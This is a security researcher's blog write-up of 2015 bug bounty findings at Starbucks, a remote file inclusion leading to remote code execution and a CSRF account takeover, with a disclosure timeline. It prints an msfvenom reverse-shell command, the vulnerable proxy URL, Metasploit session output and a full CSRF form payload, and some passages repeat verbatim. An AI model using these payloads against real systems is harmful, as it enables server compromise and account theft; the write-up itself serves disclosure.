Hello Everyone !
How I Hacked Starbucks?
Today i will show you how I discovered a lot of critical security vulnerabilities at (Starbucks) it can lead to very harmful impact on all users by force users change their passwords , add alternative emails or change anything in their store profile settings and steal users stored credit-cards. also can perform phishing attack on users and remote code execution on Starbucks servers.
Story:
One year ago there was a Zero-Day for Starbucks about iOS Mobile Application and it was "Insecure Data Storage" vulnerability. So when i was searching about Starbucks hacking news i found that two months ago there was another vulnerability which allows attackers to steal Starbucks users gift cards and duplicate funds on Starbucks gift cards. So i noticed 2 months ago that Starbucks joined bug bounty programs. So my passion lead me to take a look on Starbucks looking for a vulnerabilities in Starbucks until i found two major critical vulnerabilities which allows an attacker to perform Remote Code Execution on Starbucks server also phishing attacks via Remote File Inclusion Vulnerability and another one it was critical also about CSRF store account take over by just one-click. Starbucks store account contains payment history.
News URLs :
http://www.bbc.co.uk/news/technology-32844123
http://www.cnbc.com/2015/05/13/hackers-target-starbucks-gift-cardholders.html
Story:
One year ago there was a Zero-Day for Starbucks about iOS Mobile Application and it was "Insecure Data Storage" vulnerability. So when i was searching about Starbucks hacking news i found that two months ago there was another vulnerability which allows attackers to steal Starbucks users gift cards and duplicate funds on Starbucks gift cards. So i noticed 2 months ago that Starbucks joined bug bounty programs. So my passion lead me to take a look on Starbucks looking for a vulnerabilities in Starbucks until i found two major critical vulnerabilities which allows an attacker to perform Remote Code Execution on Starbucks server also phishing attacks via Remote File Inclusion Vulnerability and another one it was critical also about CSRF store account take over by just one-click. Starbucks store account contains payment history.
News URLs :
http://www.bbc.co.uk/news/technology-32844123
http://www.cnbc.com/2015/05/13/hackers-target-starbucks-gift-cardholders.html
Reconnaissance:
Reconnaissance is the main key to find good
vulnerabilities. I started to lookup for Starbucks subdomains as we all know
there’s a lot of tools can do this. But at this moment I used “wolframalpha.com”
website to get Starbucks subdomains list. One of these subdomains was “quality.starbucks”
So I decided to start with that subdomain and lookup for
sub-directories using burp suite engagement tools (discovery content) until I
found below URL:
Burp
suite engagement tools (Discovery Content)
http://quality.starbucks.com/admin/api/outside/proxy?url=
Vulnerabilities:- Remote File Inclusion Vulnerability: which occurs when a file from any location can be injected into the attacked page and included as source code for parsing and execution. it allowed me to able to perform:
- Code execution on the web server.
- Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
- Data theft/manipulation via phishing attack to steal users accounts that contain Credit cards and payment orders information.
Vulnerable URL : http://quality.starbucks.com/admin/api/outside/proxy?url= <Payload Here>
By inserting payload in URL parameter it will load inside quality.starbucks domain page so i created a poc for XSS via html page and execute as below screenshot :
Figure 1 - Cross Site-Scripting via Remote File Inclusion
So now i'm able to inject any script and got executed in quality.starbuck domain so it's time perform remote code execution on starbucks server. I created asp reverse_shell using msf venom using below command :
msfvenom -p windows/x86/shell_reverse_tcp LHOST=<IP Address> LPORT=<Port to Connect On> -f asp > shell.asp
IP Address : i used my static ip address.
Port : i used port 80. and enabled IP forwarding in my router to port 80.
I uploaded my asp reverse_shell to my domain then i used the http URL as below :
http://www.quality.starbucks.com/admin/api/outside/proxy?url=<My_Domain_Name>/shell.asp
I used exploit/multi/handler in metasploit with payload windows/x86/reverse_shell_tcp
Then setting payload attributes :
- LHOST to my internal network ip address which configured in my router ip forwarding.
- LPORT : 80
- ExitOnSession : False
Now it's time to exploit ...
exploit started and was listening ... after run above URL using asp reverse_shell i got a session opened :D
[*] Sending stage (751104 bytes) to 52.27.100.241
[*] Sending stage (751104 bytes) to 104.152.186.243
[*] Meterpreter session 1 opened (192.168.1.105:80 -> 52.27.100.241:1385) at 2015-29-07 22:57:49 +0200
[*] Meterpreter session 1 opened (192.168.1.105:80 -> 52.27.100.241:1385) at 2015-29-07 22:57:49 +0200
Figure 2 - Session Opened / Remote Code Execution Succeeded
2 . Starbucks Store Account Take-Over CSRF Vulnerability: An attacker can send malicious link to force victim to change user's store account information including account password. so attacker can also steal users credit included in victims accounts.
URL : https://store.starbucks.com/
Payload :
==========
<html>
<body onload="document.csrf.submit()">
<form action="https://store.starbucks.com/on/demandware.store/Sites-Starbucks-Site/default/MyAccount-EditProfileAjax" method="post" name="csrf">
<input type="hidden" name="dwfrm_profile_customer_firstname" value="attacker"><br>
<input type="hidden" name="dwfrm_profile_customer_lastname" value="attacker"><br>
<input type="hidden" name="dwfrm_profile_customer_email" value="attacker@gmail.com"><br>
<input type="hidden" name="dwfrm_profile_login_password" value="hacked@2015"><br>
<input type="hidden" name="dwfrm_profile_login_passwordconfirm" value="hacked@2015"><br>
<input type="hidden" name="dwfrm_profile_login_question" value=""><br>
<input type="hidden" name="dwfrm_profile_login_answer" value=""><br>
<input type="hidden" name="dwfrm_profile_customer_emailsource" value="Website+-+Registration"><br>
<input type="hidden" name="newpwsubmitted" value="true"><br>
</form>
</body>
</html>
URL : https://store.starbucks.com/
Payload :
==========
<html>
<body onload="document.csrf.submit()">
<form action="https://store.starbucks.com/on/demandware.store/Sites-Starbucks-Site/default/MyAccount-EditProfileAjax" method="post" name="csrf">
<input type="hidden" name="dwfrm_profile_customer_firstname" value="attacker"><br>
<input type="hidden" name="dwfrm_profile_customer_lastname" value="attacker"><br>
<input type="hidden" name="dwfrm_profile_customer_email" value="attacker@gmail.com"><br>
<input type="hidden" name="dwfrm_profile_login_password" value="hacked@2015"><br>
<input type="hidden" name="dwfrm_profile_login_passwordconfirm" value="hacked@2015"><br>
<input type="hidden" name="dwfrm_profile_login_question" value=""><br>
<input type="hidden" name="dwfrm_profile_login_answer" value=""><br>
<input type="hidden" name="dwfrm_profile_customer_emailsource" value="Website+-+Registration"><br>
<input type="hidden" name="newpwsubmitted" value="true"><br>
</form>
</body>
</html>
Proof-Of-Concept Video:
Time Line:
Vulnerability Discovery: 29/Jun/2015
Vulnerability Reported: 29/Jun/2015
No reply from Starbucks security team so i contacted starbucks customer support on twitter on 04/July/2015 with no reply also.
Reported to US-CERT : 01 July 2015.
US-CERT Reply Date : 08 July 2015.
Figure 3 - US-CERT First Reply
I got a second reply from US-CERT about Starbucks vulnerabilities confirmation.
US-CERT Second Reply : 20 Aug 2015
Figure 4 - Starbucks Vulnerabilities Confirmation
Vulnerabilities fixed 10 days ago and still waiting reply from Starbucks as per US-CERT latest reply :
Figure 5 - Waiting Reply From Starbucks about reward and publication.
Conclusion:
Starbucks Security Manager Reward Reply : 21 SEP 2015
Figure 6 - Starbucks bounty reply (2000 $) Dollars
Thanks for reading :) Hope you enjoyed it... :D
About Author:
I'm Mohamed M.Fouad Information Security Engineer / Consultant at SecureMisr also an Independent Security Researcher from Egypt with more than 5 years of experience in web and mobile applications development, penetration testing, secure-coding, Network penetration testing, security code auditing and incident response. Conducted vulnerability assessment and penetration testing for many high-profiles companies and banks over all middle east. In addition to worked as a free-lancer with multi-national companies ex: Monster Recruitment...
I have been got acknowledgement from many of the Firms like as :
Microsoft,Oracle,Yahoo,eBay,Sony,WordPress,ESET,BitDefender,AT&T,Huawui,DropCam, Bitcasa, Get Pocket, Splitwise and so many...
This comment has been removed by a blog administrator.
ReplyDeleteWhat led you to try these url+aproaches? Great catches BTW :-)
ReplyDeletehttp://egypetroleum.blogspot.com.eg/
ReplyDelete